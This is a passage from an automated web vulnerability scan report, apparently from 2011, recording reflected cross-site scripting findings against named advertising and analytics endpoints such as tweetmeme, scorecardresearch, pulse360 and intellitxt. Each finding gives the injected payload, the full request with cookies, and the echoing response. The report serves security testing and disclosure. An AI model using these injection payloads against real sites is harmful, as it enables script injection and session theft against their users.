User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_unique_ident=4db0cb914d8999.97267012-57c11f7a933564d3f62b1bb71b01e19d

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 09 May 2011 16:05:57 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-RateLimit-Limit: 400
X-RateLimit-Remaining: 373
X-Url-Lookup: OrAdd (23)
X-Served-By: h01
Content-Length: 476

VM.c10623865538fba<script>alert(1)</script>9c1155ffa67({"status":"success","story":{"title":"Vibrant - The Leaders of Contextual and In-Text Advertising","url":"http:\/\/www.vibrantmedia.com\/?referrer=Intellitxt.com","media_type":"news","created_at":"201
...[SNIP]...

2.52. http://api.tweetmeme.com/url_info.jsonc [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /url_info.jsonc

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 61d9e<img%20src%3da%20onerror%3dalert(1)>73e21013e01 was submitted in the url parameter. This input was echoed as 61d9e<img src=a onerror=alert(1)>73e21013e01 in the application's response. The reflection lands inside the double-quoted "url" JSON string of a JSONP body, but the response is served as text/html, so a browser that opens this URL directly parses the reflected <img> tag as HTML and the onerror handler runs in the api.tweetmeme.com origin.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /url_info.jsonc?url=http%3A%2F%2Fwww.vibrantmedia.com%2F%3Freferrer%3DIntellitxt.com61d9e<img%20src%3da%20onerror%3dalert(1)>73e21013e01&callback=VM.c106238655 HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://www.vibrantmedia.com/?referrer=Intellitxt.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_unique_ident=4db0cb914d8999.97267012-57c11f7a933564d3f62b1bb71b01e19d

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 09 May 2011 16:05:56 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-RateLimit-Limit: 400
X-RateLimit-Remaining: 375
X-Url-Lookup: OrAdd (306)
X-Served-By: h01
Content-Length: 365

VM.c106238655({"status":"success","story":{"title":"Vibrant - The Leaders of Contextual and In-Text Advertising","url":"http:\/\/www.vibrantmedia.com\/?referrer=Intellitxt.com61d9e<img src=a onerror=alert(1)>73e21013e01","media_type":"news","created_at":"2011-05-09 16:05:56","url_count":0,"tm_link":"http:\/\/tweetmeme.com\/story\/4990310698","comment_count":0}});

2.53. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the application's response without encoding. The payload 581b4<script>alert(1)</script>629a79ccfc5 was submitted in the c1 parameter. This input was echoed unmodified in the application's response. The reflection lands inside the double-quoted c1 string literal of the COMSCORE.beacon({...}) call in a file served as application/x-javascript; the payload does not terminate that literal, and a browser executing the file as script does not parse <script> tags inside a string, so the tag fires only if the response is rendered as an HTML document. A break-out from the double-quoted literal is not demonstrated in this report.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3581b4<script>alert(1)</script>629a79ccfc5&c2=6036066&c3=KELL-CRN-003-01-CHI&c4=214084026&c5=319082770&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CHI/iview/319082770/direct;wi.728;hi.90/01/OWIxMWM5N2QtOGI4NS00YjYyLTgxYTUtZjQxOWM5NzE3M2IxfEFGTUE4YVhNR018MTMwNDk1NzAxNTYyN3w0NDU1ODI1fDBGU1o4VEc1WE18MFJKT2ZmcGxJZ3xFWF8xMjU2ODExODc1fDgwMTAxMA?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 16:03:40 GMT
Date: Mon, 09 May 2011 16:03:40 GMT
Connection: close
Content-Length: 1271

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3581b4<script>alert(1)</script>629a79ccfc5", c2:"6036066", c3:"KELL-CRN-003-01-CHI", c4:"214084026", c5:"319082770", c6:"", c10:"", c15:"", c16:"", r:""});



2.54. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the application's response without encoding. The payload 9badc<script>alert(1)</script>e184f9a114f was submitted in the c15 parameter. This input was echoed unmodified in the application's response. The reflection lands inside the double-quoted c15 string literal of the COMSCORE.beacon({...}) call in a file served as application/x-javascript; the payload does not terminate that literal, so the tag fires only if the response is rendered as an HTML document rather than executed as script.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=9badc<script>alert(1)</script>e184f9a114f&tm=907060 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 16:03:44 GMT
Date: Mon, 09 May 2011 16:03:44 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"9badc<script>alert(1)</script>e184f9a114f", c16:"", r:""});



2.55. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the application's response without encoding. The payload a4098<script>alert(1)</script>ae08c3db88e was submitted in the c2 parameter. This input was echoed unmodified in the application's response. The reflection lands inside the double-quoted c2 string literal of the COMSCORE.beacon({...}) call in a file served as application/x-javascript; the payload does not terminate that literal, so the tag fires only if the response is rendered as an HTML document rather than executed as script.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036066a4098<script>alert(1)</script>ae08c3db88e&c3=KELL-CRN-003-01-CHI&c4=214084026&c5=319082770&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CHI/iview/319082770/direct;wi.728;hi.90/01/OWIxMWM5N2QtOGI4NS00YjYyLTgxYTUtZjQxOWM5NzE3M2IxfEFGTUE4YVhNR018MTMwNDk1NzAxNTYyN3w0NDU1ODI1fDBGU1o4VEc1WE18MFJKT2ZmcGxJZ3xFWF8xMjU2ODExODc1fDgwMTAxMA?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 16:03:41 GMT
Date: Mon, 09 May 2011 16:03:41 GMT
Connection: close
Content-Length: 1271

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6036066a4098<script>alert(1)</script>ae08c3db88e", c3:"KELL-CRN-003-01-CHI", c4:"214084026", c5:"319082770", c6:"", c10:"", c15:"", c16:"", r:""});



2.56. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the application's response without encoding. The payload 18502<script>alert(1)</script>580a4143ba0 was submitted in the c3 parameter. This input was echoed unmodified in the application's response. The reflection lands inside the double-quoted c3 string literal of the COMSCORE.beacon({...}) call in a file served as application/x-javascript; the payload does not terminate that literal, so the tag fires only if the response is rendered as an HTML document rather than executed as script.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036066&c3=KELL-CRN-003-01-CHI18502<script>alert(1)</script>580a4143ba0&c4=214084026&c5=319082770&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CHI/iview/319082770/direct;wi.728;hi.90/01/OWIxMWM5N2QtOGI4NS00YjYyLTgxYTUtZjQxOWM5NzE3M2IxfEFGTUE4YVhNR018MTMwNDk1NzAxNTYyN3w0NDU1ODI1fDBGU1o4VEc1WE18MFJKT2ZmcGxJZ3xFWF8xMjU2ODExODc1fDgwMTAxMA?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 16:03:41 GMT
Date: Mon, 09 May 2011 16:03:41 GMT
Connection: close
Content-Length: 1271

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6036066", c3:"KELL-CRN-003-01-CHI18502<script>alert(1)</script>580a4143ba0", c4:"214084026", c5:"319082770", c6:"", c10:"", c15:"", c16:"", r:""});



2.57. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the application's response without encoding. The payload 69d0a<script>alert(1)</script>a71b67a8cd4 was submitted in the c4 parameter. This input was echoed unmodified in the application's response. The reflection lands inside the double-quoted c4 string literal of the COMSCORE.beacon({...}) call in a file served as application/x-javascript; the payload does not terminate that literal, so the tag fires only if the response is rendered as an HTML document rather than executed as script.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036066&c3=KELL-CRN-003-01-CHI&c4=21408402669d0a<script>alert(1)</script>a71b67a8cd4&c5=319082770&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CHI/iview/319082770/direct;wi.728;hi.90/01/OWIxMWM5N2QtOGI4NS00YjYyLTgxYTUtZjQxOWM5NzE3M2IxfEFGTUE4YVhNR018MTMwNDk1NzAxNTYyN3w0NDU1ODI1fDBGU1o4VEc1WE18MFJKT2ZmcGxJZ3xFWF8xMjU2ODExODc1fDgwMTAxMA?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 16:03:41 GMT
Date: Mon, 09 May 2011 16:03:41 GMT
Connection: close
Content-Length: 1271

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6036066", c3:"KELL-CRN-003-01-CHI", c4:"21408402669d0a<script>alert(1)</script>a71b67a8cd4", c5:"319082770", c6:"", c10:"", c15:"", c16:"", r:""});



2.58. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the application's response without encoding. The payload 586b1<script>alert(1)</script>1ccd1613300 was submitted in the c5 parameter. This input was echoed unmodified in the application's response. The reflection lands inside the double-quoted c5 string literal of the COMSCORE.beacon({...}) call in a file served as application/x-javascript; the payload does not terminate that literal, so the tag fires only if the response is rendered as an HTML document rather than executed as script.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036066&c3=KELL-CRN-003-01-CHI&c4=214084026&c5=319082770586b1<script>alert(1)</script>1ccd1613300&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CHI/iview/319082770/direct;wi.728;hi.90/01/OWIxMWM5N2QtOGI4NS00YjYyLTgxYTUtZjQxOWM5NzE3M2IxfEFGTUE4YVhNR018MTMwNDk1NzAxNTYyN3w0NDU1ODI1fDBGU1o4VEc1WE18MFJKT2ZmcGxJZ3xFWF8xMjU2ODExODc1fDgwMTAxMA?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 16:03:41 GMT
Date: Mon, 09 May 2011 16:03:41 GMT
Connection: close
Content-Length: 1271

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6036066", c3:"KELL-CRN-003-01-CHI", c4:"214084026", c5:"319082770586b1<script>alert(1)</script>1ccd1613300", c6:"", c10:"", c15:"", c16:"", r:""});



2.59. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the application's response without encoding. The payload c834e<script>alert(1)</script>d39317618e1 was submitted in the c6 parameter. This input was echoed unmodified in the application's response. The reflection lands inside the double-quoted c6 string literal of the COMSCORE.beacon({...}) call in a file served as application/x-javascript; the payload does not terminate that literal, so the tag fires only if the response is rendered as an HTML document rather than executed as script.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036066&c3=KELL-CRN-003-01-CHI&c4=214084026&c5=319082770&c6=c834e<script>alert(1)</script>d39317618e1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CHI/iview/319082770/direct;wi.728;hi.90/01/OWIxMWM5N2QtOGI4NS00YjYyLTgxYTUtZjQxOWM5NzE3M2IxfEFGTUE4YVhNR018MTMwNDk1NzAxNTYyN3w0NDU1ODI1fDBGU1o4VEc1WE18MFJKT2ZmcGxJZ3xFWF8xMjU2ODExODc1fDgwMTAxMA?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 16:03:41 GMT
Date: Mon, 09 May 2011 16:03:41 GMT
Connection: close
Content-Length: 1271

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6036066", c3:"KELL-CRN-003-01-CHI", c4:"214084026", c5:"319082770", c6:"c834e<script>alert(1)</script>d39317618e1", c10:"", c15:"", c16:"", r:""});



2.60. http://cdn.w55c.net/i/0RJOffplIg_1080158746.html [btid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RJOffplIg_1080158746.html

Issue detail

The value of the btid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ef6b'%3balert(1)//0e76d32b692 was submitted in the btid parameter. This input was echoed as 8ef6b';alert(1)//0e76d32b692 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /i/0RJOffplIg_1080158746.html?rtbhost=rts-rr16.sldc.dataxu.net&btid=OWIxMWM5N2QtOGI4NS00YjYyLTgxYTUtZjQxOWM5NzE3M2IxfEFGTUE4YVhNR018MTMwNDk1NzAxNTYyN3w0NDU1ODI1fDBGU1o4VEc1WE18MFJKT2ZmcGxJZ3xFWF8xMjU2ODExODc1fDgwMTAxMA8ef6b'%3balert(1)//0e76d32b692&ei=ADMELD&wp_exchange=0.80&euid=YWM1YWZlODktZGJlMy00YTk5LTljNjAtNTlmNGZiNDk1Y2I5&slotid=NDQ1NTgyNQ&fiu=MEZTWjhURzVYTQ&ciu=MFJKT2ZmcGxJZw&reqid=OWIxMWM5N2QtOGI4NS00YjYyLTgxYTUtZjQxOWM5NzE3M2Ix&ccw=SUFCWDMwIzAuMDQ5NzM2MTl8SUFCMTIjMC4xMTIxNTUxfElBQjE0IzAuMDQwODg3Ng&epid=QU02MTA&esid=QU0xNjM3&bp=801&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=&v=0&geo=VVN8VFh8NjIzfDc1MjA3&s=http%3A%2F%2Fwww.courier-journal.com%2Farticle%2F20110509%2Ffeatures07%2F305090030%2Fmonday-s-tv-talk-show-lineup%3Fodyssey%3Dmod%257cnewswell%257ctext%257chome%257cs&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:02:31 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Wed, 08-May-13 16:03:50 GMT
Cache-Control: no-cache, no-store
content-type: text/html
P3P: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 02 May 2011 22:39:41 GMT
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 81
pragma: no-cache
Via: 1.1 mdw061004 (MII-APC/1.6)
Content-Length: 2525

<script language="javascript" type="text/javascript">
new function() {
this.rand = Math.floor((Math.random() + "") * 1000000000000);
this.dvparams = 'ctx=948951&cmp=996492&plc=319082770&sid=761056';

...[SNIP]...
dmt.com/CHI/iview/319082770/direct;wi.728;hi.90/01/OWIxMWM5N2QtOGI4NS00YjYyLTgxYTUtZjQxOWM5NzE3M2IxfEFGTUE4YVhNR018MTMwNDk1NzAxNTYyN3w0NDU1ODI1fDBGU1o4VEc1WE18MFJKT2ZmcGxJZ3xFWF8xMjU2ODExODc1fDgwMTAxMA8ef6b';alert(1)//0e76d32b692?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">
...[SNIP]...

2.61. http://content.pulse360.com/cgi-bin/context.cgi [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /cgi-bin/context.cgi

Issue detail

The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9151'%3balert(1)//d856beecd2e was submitted in the id parameter. This input was echoed as b9151';alert(1)//d856beecd2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/context.cgi?id=91041742b9151'%3balert(1)//d856beecd2e&ganid=courier-journal&gans=life&ganss=television&format=bare&ganst=&title=1&signup=1 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vi_1.021=130494962020315081000000106057056; fc_1.2=AXTzx00

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:03:39 GMT
Server: Barista/1.1-(eangbi)
Connection: Close
Content-Length: 3465
Content-Type: text/html
P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"

document.write('<style type="text/css">.p360_listing { cursor: pointer;}</style><!--Ad Markup by Seevast--><div id="p360_ad_unit"><div id="p360_header"><div class="p360_aligner_left"><span id="p360_
...[SNIP]...
<a target="_Blank" href="https://ads.pulse360.com/advertisers.html?refid=91041742b9151';alert(1)//d856beecd2e" style="color: inherit; text-decoration: inherit;" >
...[SNIP]...

2.62. http://courier-journal.us.intellitxt.com/al.asp [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://courier-journal.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 90a33%3balert(1)//ce6ebe43456 was submitted in the jscallback parameter. This input was echoed as 90a33;alert(1)//ce6ebe43456 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ts=20110509160347&adid=0%2C0%2C848150%2C0%2C0&cc=us&di=32450713%2C22896618%2C32421681%2C6371008%2C22751926&hk=1&ipid=10323&mh=5df8b1e5a4074f05fec4903c8d524558&pid=2%2C8%2C2%2C8%2C8&pvm=11ff088049a7507413a6131b3304dff0&pvu=C70EB3C2E91B40FDB6F9E4B08261986D&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0&kp=245%2C816%3B600%2C993%3B389%2C1218%3B613%2C1619%3B1465%2C2576%3B&prf=ll%3A450%7Cintl%3A3077%7Cpreprochrome%3A5%7Cgetconchrome%3A293%7Cadvint%3A3426%7Cadvl%3A3426%7Ctl%3A5811&jscallback=$iTXT.js.callback190a33%3balert(1)//ce6ebe43456 HTTP/1.1
Host: courier-journal.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR="AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwMAAAEv1X/pTgA-"

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR="AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwMAAAEv1X/pTgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Fri, 08-Jul-2011 16:04:42 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Mon, 09 May 2011 16:04:42 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback190a33;alert(1)//ce6ebe43456();}catch(e){}
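
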